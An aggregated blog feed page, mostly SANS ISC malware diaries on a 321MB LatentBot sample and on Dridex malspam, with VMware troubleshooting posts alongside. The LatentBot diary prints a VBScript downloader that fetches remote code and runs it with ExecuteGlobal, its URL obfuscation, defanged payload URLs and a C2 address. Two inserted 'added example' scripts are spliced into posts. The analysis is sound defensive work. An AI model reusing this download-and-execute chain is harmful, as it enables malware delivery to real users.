BuildforCOVID19 Global Online Hackathon

This post was originally published on this site

The COVID-19 Global Hackathon is an opportunity for builders to create software solutions that drive social impact with the aim of tackling some of the challenges related to the current coronavirus (COVID-19) pandemic.

We’re encouraging YOU – builders around the world – to #BuildforCOVID19 using technologies of your choice across a range of suggested themes and challenge areas, some of which have been sourced through health partners like the World Health Organization. The hackathon welcomes locally and globally focused solutions and is open to all developers.

AWS is partnering with technology companies like Facebook, Giphy, Microsoft, Pinterest, Slack, TikTok, Twitter, and WeChat to support this hackathon. We will be providing technical mentorship and credits for all participants.

Join BuildforCOVID19 and chat with fellow participants and AWS mentors in the COVID19 Global Hackathon Slack channel.

Jeff;

Very Large Sample as Evasion Technique?, (Thu, Mar 26th)


Security controls have a major requirement: they must not (or at least try not to) interfere with normal operations of the protected system. It is known that antivirus products do not scan very large files (or only scan the first x bytes) for performance reasons. Can we consider a very big file as a technique to bypass security controls? Yesterday, while hunting, I spotted a very interesting malware sample. The malicious PE file was delivered via multiple stages but the final dropped file was large… very large!

It started with a classic phishing email containing a shortened URL:

hxxp://bit[.]ly/2WFm2wY

(Tip: Not many people are aware that if you add a ‘+’ sign at the end of a bit.ly URL, you won’t be redirected automatically to the real URL but a page with the link will be returned instead. This can help you to decide if the shortened URL is malicious or not.)

This URL redirected to a second shortener service:

hxxps://rebrand[.]ly/9zcj74uFAT039

Finally, the real URL was visited:

hxxps://cld[.]pt/dl/download/6812fec0-88b6-4e41-9eb1-e5cb06be83e0/sapotransfer-5a1a0746e3e7ePG/ER-3939874-FT.zip?download=true

The ZIP archive (SHA256:7dc6b78fac829e25232fa5fa885464d25bdef45fa577d10f3e73fe393e1c2c19) contains a VBScript file ‘ER-3939874-FT.vbs’ (SHA256:494b9fc1957434ac5626d5fa17189db09f1acea00c856caf107d7bb22fde5ec5).

A quick analysis reveals that the code is very simple:

It downloads another piece of code from a URL:

Set Dnlakdnsks = CreateObject("Msxml2.XMLHttp.6.0")
Dnlakdnsks.open "GET", Cfgghhhh("_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y"), False
Dnlakdnsks.send

And executes it:

Function DJierorpoop(WWWWWw)
  ExecuteGlobal WWWWWw
End Function
DJierorpoop Dnlakdnsks.responseText

The URL (‘_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y’) is deobfuscated via the following function:

Function Cfgghhhh(G1g)
  For DnnKS = 1 To Len(G1g)
    MDNSLS = Mid(G1g, DnnKS, 1)
    MDNSLS = Chr(Asc(MDNSLS)+ 9)
    SSXSLDKSNS = SSXSLDKSNS + MDNSLS
  Next
  Cfgghhhh = SSXSLDKSNS
End Function

We can simulate it in Python. The string is processed character by character: each character is converted to its ASCII value, shifted by 9 positions and converted back:

>>> s = '_kkgj1&&gXjkY`e%Zfd&iXn&>D)/_E?Y'
>>> out = ''
>>> for c in s:
...     out = out + chr(ord(c) + 9)
...
>>> out
'hxxps://pastebin[.]com/raw/GM28hNHb'

This pastie contains more VBScript code and, once executed, it performs the following actions:

It downloads the next stage from the Internet. The URL is encoded using the same technique (see above) but the characters are shifted by 10 instead of 9. The deobfuscated URL is:

hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso

The .iso file is a big chunk of Base64 encoded data. Once decoded, we have a ZIP archive:

remnux@remnux:/malwarezoo$ wget hxxp://160[.]20[.]147[.]130:1948/DNsikidstrou9095.iso
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso | file -
/dev/stdin: Zip archive data, at least v2.0 to extract
remnux@remnux:/malwarezoo$ base64 -d DNsikidstrou9095.iso >DNsikidstrou9095.iso.zip
remnux@remnux:/malwarezoo$ unzip DNsikidstrou9095.iso.zip
Archive:  DNsikidstrou9095.iso.zip
  inflating: DNsikidstrou9095.exe

The PE file (SHA256:a5d786ee432dd486d6773621301997c3143dc47a8525c683ff6281990ff9d14d) is very large:

remnux@remnux:/malwarezoo$ ls -lh DNsikidstrou9095.exe
-rw-r--r-- 1 remnux remnux 321M Mar 25 08:20 DNsikidstrou9095.exe

321MB is really big! This trick makes it very easy to bypass many security controls.

Often, such files are padded with zeroes to make them bigger but it was not the case this time. Let’s inspect the PE file with PEStudio[1]. The PE file format is quite complex[2] and contains ‘sections’. Sections are ‘areas’ in the file that store different types of data:

.text: contains executable code
.data: contains ‘data’ used by the program

An interesting one is ‘.rsrc’ which contains the ‘resources’. As you can see, this section takes more than 97% of the complete file size:

Resources can be any type of data embedded in the application. Common data are icons, cursors, images, etc.
In our malicious PE, we see three big resources:

PEStudio can dump resources to disk. Let’s dump them and see what we have:

remnux@remnux:/malwarezoo$ file  DNsikidstrou9095.*.bmp
DNsikidstrou9095.exe.0.bmp: PC bitmap, Windows 3.x format, 9161 x 7054 x 24
DNsikidstrou9095.exe.1.bmp: PC bitmap, Windows 3.x format, 4267 x 5293 x 24
DNsikidstrou9095.exe.2.bmp: PC bitmap, Windows 3.x format, 4414 x 4959 x 24
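The ‘.rsrc’ section taking more than 97% of the file is a property you can check without a GUI tool. The following is an added example (not code from the diary or from PEStudio): a minimal section-table parser that computes each section’s share of the file and flags resource bloat, run on a constructed PE-shaped blob that mimics the sample’s proportions.

```python
import struct

SECTION_HDR = "<8sIIII16s"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, rest

def pe_section_sizes(data: bytes) -> dict:
    """Walk the PE section table and return {section name: SizeOfRawData}."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # start of the COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                          # section table follows the optional header
    sizes = {}
    for i in range(num_sections):
        name, _, _, raw_size, _, _ = struct.unpack_from(SECTION_HDR, data, table + 40 * i)
        sizes[name.rstrip(b"\0").decode("ascii", "replace")] = raw_size
    return sizes

def section_share(data: bytes, name: str = ".rsrc") -> float:
    """Fraction of the whole file occupied by one section's raw data."""
    return pe_section_sizes(data).get(name, 0) / len(data)

def is_resource_bloated(data: bytes, threshold: float = 0.9) -> bool:
    """Triage rule: flag samples whose .rsrc section dominates the file size."""
    return section_share(data) >= threshold

def build_fake_pe(sections) -> bytes:
    """Constructed test input (not a real binary): MZ stub, PE signature, COFF header
    with an empty optional header, then the section table and filler section bodies."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    ptr = 0x40 + 4 + 20 + 40 * len(sections)              # first section body starts after the headers
    table, body = b"", b""
    for name, size in sections:
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), size, 0, size, ptr, b"\0" * 16)
        body += b"\xAA" * size
        ptr += size
    return bytes(dos) + b"PE\0\0" + coff + table + body

# Constructed sample in the spirit of the diary: small .text/.data, a .rsrc that dwarfs them.
SAMPLE = build_fake_pe([(b".text", 1000), (b".data", 500), (b".rsrc", 60000)])

if __name__ == "__main__":
    for sec, size in pe_section_sizes(SAMPLE).items():
        print(f"{sec:8s} {size:8d} bytes  {100 * size / len(SAMPLE):5.1f}%")
    print("resource bloat:", is_resource_bloated(SAMPLE))
```

Real samples have a populated optional header; the parser skips it using SizeOfOptionalHeader, so the same functions work on a file read from disk.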

Files look very similar:


The images do not seem to be computer-generated. I tried to find hidden data in them, but they look ‘clean’.
The next question is: “Are these sections used by the program?”

There are many tools to play with resources but I like ResourceTuner[3]. The tool is not free but is available in demo mode for 30 days, more than enough to play with it from time to time. The tool allows you to browse resources embedded in a PE file but also to remove them:

The newly generated file now has a size of (only) 8371200 bytes (SHA256:d8d3665affc98cba7942674a51713878b903f8c19034075eb469c3ace3d6aeb6).

Let’s try to execute it again in a sandbox… Great, it worked perfectly!

It’s a variant of the Latentbot[4] that communicates with a C2 @ 18.231.122.158.

[1] https://www.winitor.com
[2] https://docs.microsoft.com/en-us/windows/win32/debug/pe-format
[3] http://www.heaventools.com/resource-tuner.htm?
[4] https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Configuring Fluentbit on VMware Cloud PKS for…


A great article describing how to send logs from Kubernetes clusters to a centralized system (here Elasticsearch) on AWS. Monitoring is a key part when we are talking K8s for many reasons that are quite obvious but sometimes forgotten. I will never repeat this enough. Monitoring is the key for happy systems, happy administrators and …

Join us for the vSphere 7 Launch Event!


Join us for the vSphere 7 Launch Event! vSphere 7 is VMware’s biggest set of innovations since the launch of ESXi. With all the excitement around this new generation of vSphere and the app modernization solutions, we felt our loyal vSphere users deserve an event just for themselves! With the help of the hosts from …

NSX-T: vCenter and NSX-T Inventory out of Sync (Hosts in vSphere not showing up in NSX-T)


Summary:
NSX-T loses sync with the vCenter inventory, but the statuses don’t show an issue. Basically, when you add a host to a vCenter cluster, the NSX-T bits should automatically start installing on the new host, assuming you’ve created a Transport Node Profile and associated it with the cluster. The problem is that NSX-T doesn’t see the new host, even though its link to the compute manager (vCenter) looks fine.

Looks fine, Y U NO WORK!?

So what’s going on here? 
This appears to affect NSX-T 2.5 and 2.5.1.  Cause is unknown.

Workaround:
Restart the cm-inventory service on each NSX-T mgmt/controller node using API or CLI.

Details:
If you were to query the status of cm-inventory via API or CLI, you could query all 3 manager/controller nodes and get a status of running. Even the primary node associated with the VIP, if configured, is not necessarily in charge of inventory. So you could restart the cm-inventory service on one node till you are blue in the face and get nowhere, because another node is actually responsible for maintaining the sync.

Even so, with this particular problem, they would all look healthy.  You’d have to dig into the logs to find the issue.  Thankfully Nathan Pyle from VMware helped us find the issue and provided us w/ a workaround solution until the bug is addressed in a future version.

API Method:
GET /api/v1/node/services/cm-inventory/status
POST /api/v1/node/services/cm-inventory?action=restart

CLI Method:
get service cm-inventory
restart service cm-inventory 
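Because every node reports ‘running’ and the node owning the inventory sync is not necessarily the VIP one, the workaround is applied to all managers. The script below is an added example (not from the original post) that drives the two API calls above against each node in turn and records the state before and after; the manager addresses and credentials are placeholders, and the ‘runtime_state’ field name in the status reply is an assumption.

```python
import base64
import json
import ssl
import urllib.request

# Constructed placeholders (assumption): replace with the real manager node addresses.
NSX_MANAGERS = ["192.0.2.11", "192.0.2.12", "192.0.2.13"]
STATUS_PATH = "/api/v1/node/services/cm-inventory/status"
RESTART_PATH = "/api/v1/node/services/cm-inventory?action=restart"

def build_request(node, path, user, password, method="GET"):
    """Basic-auth request against one manager node (the node API is per node, not via the VIP)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(f"https://{node}{path}", method=method)
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/json")
    return req

def https_send(req):
    """Default transport: TLS-verified call, reply decoded as JSON (empty body -> {})."""
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        body = resp.read()
    return json.loads(body) if body else {}

def restart_cm_inventory(nodes, user, password, send=https_send):
    """Restart cm-inventory on every node (none of them reliably reports the fault)
    and return {node: (state before, state after)}. Assumption: the status document
    carries the service state in a 'runtime_state' field."""
    results = {}
    for node in nodes:
        before = send(build_request(node, STATUS_PATH, user, password))
        send(build_request(node, RESTART_PATH, user, password, method="POST"))
        after = send(build_request(node, STATUS_PATH, user, password))
        results[node] = (before.get("runtime_state"), after.get("runtime_state"))
    return results

class DryRunTransport:
    """Offline stand-in for https_send: records every call and always answers 'running'."""
    def __init__(self):
        self.calls = []
    def __call__(self, req):
        self.calls.append((req.get_method(), req.full_url))
        return {"runtime_state": "running"}

if __name__ == "__main__":
    dry = DryRunTransport()   # swap for https_send (default) to run it for real
    print(restart_cm_inventory(NSX_MANAGERS, "admin", "PLACEHOLDER", send=dry))
    for method, url in dry.calls:
        print(method, url)
```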

Recent Dridex activity, (Wed, Mar 25th)


Introduction

This week, I’ve seen a lot of malicious spam (malspam) pushing Dridex malware.  Today’s diary provides a quick rundown on the types of malspam I’ve seen, and it also covers what an infected Windows host looks like.

The malspam

I’ve seen at least 3 different themes used during the first two days of this week from malspam pushing Dridex.  One was a voicemail-themed email.  Another used a DHL theme.  Finally, I saw a FedEx-themed email pushing Dridex.  See the images below for examples.


Shown above:  Malspam using a voicemail theme to push Dridex.


Shown above:  Malspam using a DHL theme to push Dridex.


Shown above:  Malspam using a FedEx theme to push Dridex.

An infected Windows host

I infected a lab host using a URL from one of the emails shown above.  See images below for details.


Shown above:  Clicking on the link in the FedEx email.


Shown above:  Extracting a VBS file from the downloaded zip archive.


Shown above:  Running the VBS file drops the initial DLL for Dridex.


Shown above:  Dridex persistence mechanism 1 of 3–a scheduled task.


Shown above:  Dridex persistence mechanism 2 of 3–a registry update.


Shown above:  Dridex persistence mechanism 3 of 3–a shortcut in the Windows startup menu.

Indicators

URLs from the three email examples:

  • hxxp://bienvenidosnewyork[.]com/app.php
  • hxxp://photoflip[.]co[.]in/lndex.php
  • hxxp://everestedu[.]org/lndex.php

Zip archive downloaded from link in one of the malspam:

VBS file extracted from the above zip archive:

Initial Dridex DLL seen after running VBS file:

File hashes for Dridex DLLs made persistent during the infection:

Final notes

Of note, zip archives from links in the emails appeared to be different names/sizes/hashes each time I downloaded one, even if it was from the same link.  Also, when a Dridex-infected Windows host is rebooted, the locations, names, and file hashes of the persistent Dridex DLL files are changed.

Dridex remains a feature of our threat landscape, and it will likely continue to be, at least in the foreseeable future.  Windows 10 hosts that are fully patched and up-to-date have a very low risk of getting infected from Dridex, so it pays to follow best security practices.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

vRealize Automation 8.0.1 fails (new install/ after reboot)


Making a post on this as I experienced it first hand. The issue is that, after a reboot, some pods will not run, specifically vco and pg. This can be verified by executing the following command on one of the nodes: kubectl get pods --all-namespaces. You’ll notice some pods are in a CrashLoop state. To resolve, the following KB will help: https://kb.vmware.com/s/article/78235 For new installs: https://kb.vmware.com/s/article/76870 Hope that helps!

Export / Backup VMware NSX ESG/DLR configurations with PowerNSX (part 1, ESGs)


Why do you need this? If you work with VMware NSX on a daily basis you should care about the Backup & Restore procedure. According to VMware you can schedule an NSX Manager backup and think you are on the safe side, but the restore procedure requires performing a full NSX Manager restore and then…

The post Export / Backup VMware NSX ESG/DLR configurations with PowerNSX (part 1, ESGs) appeared first on The Virtualist.

Create NSX-T Edge Cluster – VMware NSX-T Part 18


NSX-T Edge provides computational power to deliver IP routing and services. We can deploy up to 10 Edge nodes to form an NSX-T Edge cluster. An NSX Edge cluster is a group of homogeneous nodes with common properties that provide high availability for the Edge nodes. Having an NSX-T edge cluster will ensure that at […]

The post Create NSX-T Edge Cluster – VMware NSX-T Part 18 appeared first on VMware Arena.